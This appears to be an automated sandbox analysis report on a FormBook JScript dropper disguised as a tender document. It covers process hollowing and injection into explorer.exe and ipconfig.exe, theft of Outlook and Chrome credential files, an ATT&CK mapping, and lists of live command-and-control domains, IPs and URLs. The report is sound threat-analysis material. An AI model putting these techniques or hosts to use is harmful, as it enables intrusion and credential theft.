          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CAD30 mov eax, dword ptr fs:[00000030h]6_2_032CAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9100 mov eax, dword ptr fs:[00000030h]6_2_032C9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9100 mov eax, dword ptr fs:[00000030h]6_2_032C9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9100 mov eax, dword ptr fs:[00000030h]6_2_032C9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CC962 mov eax, dword ptr fs:[00000030h]6_2_032CC962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EC577 mov eax, dword ptr fs:[00000030h]6_2_032EC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EC577 mov eax, dword ptr fs:[00000030h]6_2_032EC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CB171 mov eax, dword ptr fs:[00000030h]6_2_032CB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CB171 mov eax, dword ptr fs:[00000030h]6_2_032CB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EB944 mov eax, dword ptr fs:[00000030h]6_2_032EB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EB944 mov eax, dword ptr fs:[00000030h]6_2_032EB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03303D43 mov eax, dword ptr fs:[00000030h]6_2_03303D43
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03343540 mov eax, dword ptr fs:[00000030h]6_2_03343540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E7D50 mov eax, dword ptr fs:[00000030h]6_2_032E7D50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F35A1 mov eax, dword ptr fs:[00000030h]6_2_032F35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F61A0 mov eax, dword ptr fs:[00000030h]6_2_032F61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F61A0 mov eax, dword ptr fs:[00000030h]6_2_032F61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F1DB5 mov eax, dword ptr fs:[00000030h]6_2_032F1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F1DB5 mov eax, dword ptr fs:[00000030h]6_2_032F1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F1DB5 mov eax, dword ptr fs:[00000030h]6_2_032F1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C2D8A mov eax, dword ptr fs:[00000030h]6_2_032C2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C2D8A mov eax, dword ptr fs:[00000030h]6_2_032C2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C2D8A mov eax, dword ptr fs:[00000030h]6_2_032C2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C2D8A mov eax, dword ptr fs:[00000030h]6_2_032C2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C2D8A mov eax, dword ptr fs:[00000030h]6_2_032C2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA185 mov eax, dword ptr fs:[00000030h]6_2_032FA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EC182 mov eax, dword ptr fs:[00000030h]6_2_032EC182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FFD9B mov eax, dword ptr fs:[00000030h]6_2_032FFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FFD9B mov eax, dword ptr fs:[00000030h]6_2_032FFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03378DF1 mov eax, dword ptr fs:[00000030h]6_2_03378DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CB1E1 mov eax, dword ptr fs:[00000030h]6_2_032CB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CB1E1 mov eax, dword ptr fs:[00000030h]6_2_032CB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CB1E1 mov eax, dword ptr fs:[00000030h]6_2_032CB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DD5E0 mov eax, dword ptr fs:[00000030h]6_2_032DD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DD5E0 mov eax, dword ptr fs:[00000030h]6_2_032DD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033541E8 mov eax, dword ptr fs:[00000030h]6_2_033541E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FBC2C mov eax, dword ptr fs:[00000030h]6_2_032FBC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DB02A mov eax, dword ptr fs:[00000030h]6_2_032DB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DB02A mov eax, dword ptr fs:[00000030h]6_2_032DB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DB02A mov eax, dword ptr fs:[00000030h]6_2_032DB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DB02A mov eax, dword ptr fs:[00000030h]6_2_032DB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347016 mov eax, dword ptr fs:[00000030h]6_2_03347016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347016 mov eax, dword ptr fs:[00000030h]6_2_03347016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347016 mov eax, dword ptr fs:[00000030h]6_2_03347016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03394015 mov eax, dword ptr fs:[00000030h]6_2_03394015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03394015 mov eax, dword ptr fs:[00000030h]6_2_03394015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0339740D mov eax, dword ptr fs:[00000030h]6_2_0339740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0339740D mov eax, dword ptr fs:[00000030h]6_2_0339740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0339740D mov eax, dword ptr fs:[00000030h]6_2_0339740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03381C06 mov eax, dword ptr fs:[00000030h]6_2_03381C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346C0A mov eax, dword ptr fs:[00000030h]6_2_03346C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346C0A mov eax, dword ptr fs:[00000030h]6_2_03346C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346C0A mov eax, dword ptr fs:[00000030h]6_2_03346C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346C0A mov eax, dword ptr fs:[00000030h]6_2_03346C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E746D mov eax, dword ptr fs:[00000030h]6_2_032E746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03382073 mov eax, dword ptr fs:[00000030h]6_2_03382073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03391074 mov eax, dword ptr fs:[00000030h]6_2_03391074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA44B mov eax, dword ptr fs:[00000030h]6_2_032FA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335C450 mov eax, dword ptr fs:[00000030h]6_2_0335C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335C450 mov eax, dword ptr fs:[00000030h]6_2_0335C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E0050 mov eax, dword ptr fs:[00000030h]6_2_032E0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E0050 mov eax, dword ptr fs:[00000030h]6_2_032E0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FF0BF mov ecx, dword ptr fs:[00000030h]6_2_032FF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FF0BF mov eax, dword ptr fs:[00000030h]6_2_032FF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FF0BF mov eax, dword ptr fs:[00000030h]6_2_032FF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033090AF mov eax, dword ptr fs:[00000030h]6_2_033090AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9080 mov eax, dword ptr fs:[00000030h]6_2_032C9080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03343884 mov eax, dword ptr fs:[00000030h]6_2_03343884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03343884 mov eax, dword ptr fs:[00000030h]6_2_03343884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D849B mov eax, dword ptr fs:[00000030h]6_2_032D849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033814FB mov eax, dword ptr fs:[00000030h]6_2_033814FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346CF0 mov eax, dword ptr fs:[00000030h]6_2_03346CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346CF0 mov eax, dword ptr fs:[00000030h]6_2_03346CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03346CF0 mov eax, dword ptr fs:[00000030h]6_2_03346CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov eax, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov eax, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov eax, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov eax, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335B8D0 mov eax, dword ptr fs:[00000030h]6_2_0335B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398CD6 mov eax, dword ptr fs:[00000030h]6_2_03398CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040CF63 LdrLoadDll,2_2_0040CF63
          Source: C:\Users\user\AppData\Local\Temp\winner.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\System32\wscript.exeFile created: winner[1].exe.0.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.arritalvigo.com
          Source: C:\Windows\explorer.exeDomain query: www.hougou.ru
          Source: C:\Windows\explorer.exeDomain query: www.hayethe.site
          Source: C:\Windows\explorer.exeNetwork Connect: 137.59.148.248 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\System32\wscript.exeDomain query: hirosguide.hu
          Source: C:\Windows\explorer.exeNetwork Connect: 64.34.68.10 80Jump to behavior
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.227.138.48 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.121 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lakeviewautomation.com
          Source: C:\Windows\explorer.exeDomain query: www.toporsche.online
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.179.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.chimid.org
          Source: C:\Windows\explorer.exeDomain query: www.dellaone.com
          Source: C:\Windows\explorer.exeDomain query: www.panalobet88.net
          Source: C:\Windows\explorer.exeNetwork Connect: 142.44.131.177 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 14.128.47.126 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.deglaz.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yeah-go.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.versusfinances.tech
          Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeDomain query: www.44yyds.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.215.9.138 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 87.236.16.153 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1290000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\winner.exe "C:\Users\user\AppData\Local\Temp\winner.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: explorer.exe, 00000003.00000003.674746526.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.423037496.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.827550131.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\winner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\winner.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts42
          Scripting          		Path Interception512
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
          Deobfuscate/Decode Files or Information          		LSASS Memory13
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)42
          Scripting          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)5
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer15
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
          Software Packing          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Timestomp          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem1
          System Network Configuration Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)31
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)512
          Process Injection          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 794330 Sample: 0900664 MOHS Tender..js Startdate: 30/01/2023 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 8 other signatures 2->53 9 wscript.exe 16 2->9         started        process3 dnsIp4 37 hirosguide.hu 91.227.138.48, 443, 49703 DIGICABLEHU Hungary 9->37 27 C:\Users\user\AppData\Local\Temp\winner.exe, PE32 9->27 dropped 29 C:\Users\user\AppData\Local\...\winner[1].exe, PE32 9->29 dropped 69 System process connects to network (likely due to code injection or exploit) 9->69 71 Benign windows process drops PE files 9->71 73 JScript performs obfuscated calls to suspicious functions 9->73 75 Deletes itself after installation 9->75 14 winner.exe 1 9->14         started        file5 signatures6 process7 signatures8 77 Multi AV Scanner detection for dropped file 14->77 79 Machine Learning detection for dropped file 14->79 17 CasPol.exe 14->17         started        process9 signatures10 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 2 1 17->20 injected process11 dnsIp12 31 frogair.online 81.169.145.72, 49721, 49722, 80 STRATOSTRATOAGDE Germany 20->31 33 44yyds.com 137.59.148.248, 49716, 49717, 80 PUBLIC-DOMAIN-REGISTRYUS India 20->33 35 22 other IPs or domains 20->35 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 59 Uses ipconfig to lookup or modify the Windows network settings 20->59 24 ipconfig.exe 13 20->24         started        signatures13 process14 signatures15 61 Tries to steal Mail credentials (via file / registry access) 24->61 63 Tries to harvest and steal browser information (history, passwords, etc) 24->63 65 Modifies the context of a thread in another process (thread injection) 24->65 67 Maps a DLL or memory area into another process 24->67

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0900664 MOHS Tender..js18%ReversingLabsScript-JS.Trojan.FormBook
          0900664 MOHS Tender..js28%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\winner.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe34%ReversingLabsByteCode-MSIL.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\winner.exe34%ReversingLabsByteCode-MSIL.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.CasPol.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.lakeviewautomation.comwww.lakeviewautomation.com20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.hougou.ruwww.hougou.ru20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.panalobet88.net/czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA==0%Avira URL Cloudsafe
          http://www.arritalvigo.comwww.arritalvigo.com20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.deglaz.xyz/czni/0%Avira URL Cloudsafe
          http://www.chimid.org/czni/100%Avira URL Cloudmalware
          http://www.hougou.ru0%Avira URL Cloudsafe
          http://www.laylaroseuk.com100%Avira URL Cloudmalware
